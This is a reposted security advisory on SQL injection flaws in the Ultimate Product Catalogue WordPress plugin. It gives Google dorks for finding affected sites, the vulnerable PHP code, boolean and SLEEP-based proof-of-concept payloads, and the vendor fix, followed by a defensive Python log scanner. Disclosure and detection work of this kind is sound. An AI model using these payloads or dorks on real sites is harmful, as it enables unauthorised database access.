Views: 491 | Replies: 0

Ultimate Product Catalogue WordPress Plugin - SQL Injection Vulnerabilities

Posted by: Administrator
Posted on 2015-4-29 22:36:17
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue WordPress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category",
# inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to MITRE but not assigned yet
# Category: webapps

1. Summary:

    Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads, +3.000 active installations.

    Unauthenticated SQL injection in parameter "SingleProduct" when a web visitor explores a product published by the web administrator.

2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3

3. Vulnerable code:

    File Functions/Shortcodes.php line 779

    Proof of concept

    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
    http://<wordpress site>/?SingleProduct=2'+and+'a'='b

    In file Functions/Process_Ajax.php line 67:

    [...]
    $Item_ID = $_POST['Item_ID'];
    $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name WHERE Item_ID=" . $Item_ID);
    [...]

    Proof of concept:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: <wordpress host>
    [...]
    Cookie: wordpress_f305[...]

    Item_ID=2 AND SLEEP(5)&action=record_view

4. Solution:

    Update to version 3.1.3

        #  1337day.com [2015-04-29]  #
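As an added example that is not part of the advisory: a small Python scanner that applies the check the vulnerable code lacks (the plugin's ID parameters are numeric, so anything but digits is suspect) to Apache access-log lines, flagging GET requests whose SingleProduct or Item_ID value is not a plain integer, such as the two boolean probes above. The log lines and IP addresses are constructed; the Item_ID POST body from the second proof of concept is not written to standard access logs, so only the query-string vector is covered here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log sample (not real traffic): a normal product
# view, the two boolean-based probes from the advisory, and an unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Apr/2015:22:36:17 +0800] "GET /?SingleProduct=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Apr/2015:22:36:20 +0800] "GET /?SingleProduct=2'+and+'a'='a HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Apr/2015:22:36:21 +0800] "GET /?SingleProduct=2'+and+'a'='b HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Apr/2015:22:37:02 +0800] "GET /blog/?p=12 HTTP/1.1" 200 3301 "-" "curl/7.35"
"""

# Minimal combined-log pattern: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+) (?P<size>\d+)'
)

# Parameters the plugin concatenates into SQL as row IDs; both should be digits only.
NUMERIC_PARAMS = ("SingleProduct", "Item_ID")


def is_plain_int(value: str) -> bool:
    """True only for an unsigned decimal integer with no other characters."""
    return value.isdigit()


def flag_line(line: str):
    """Return (ip, param, decoded_value) when a numeric-ID parameter carries
    anything other than digits; return None for well-formed or unrelated lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs decodes '+' to space, so the probe arrives as: 2' and 'a'='a
    qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for name in NUMERIC_PARAMS:
        for raw in qs.get(name, []):
            if not is_plain_int(raw):
                return (m["ip"], name, raw)
    return None


def scan_log(text: str):
    """Run flag_line over every line of a log and collect the hits."""
    return [hit for hit in (flag_line(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, param, value in scan_log(SAMPLE_LOG):
        print(f"{ip}: non-numeric {param}={value!r}")
```

The differing response sizes on the two probe lines (5120 vs 612) are the boolean oracle a tester relies on; the scanner reports the malformed parameter regardless of size so that a single probe is enough to alert.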

© 2012-2015 Baiker Union of China.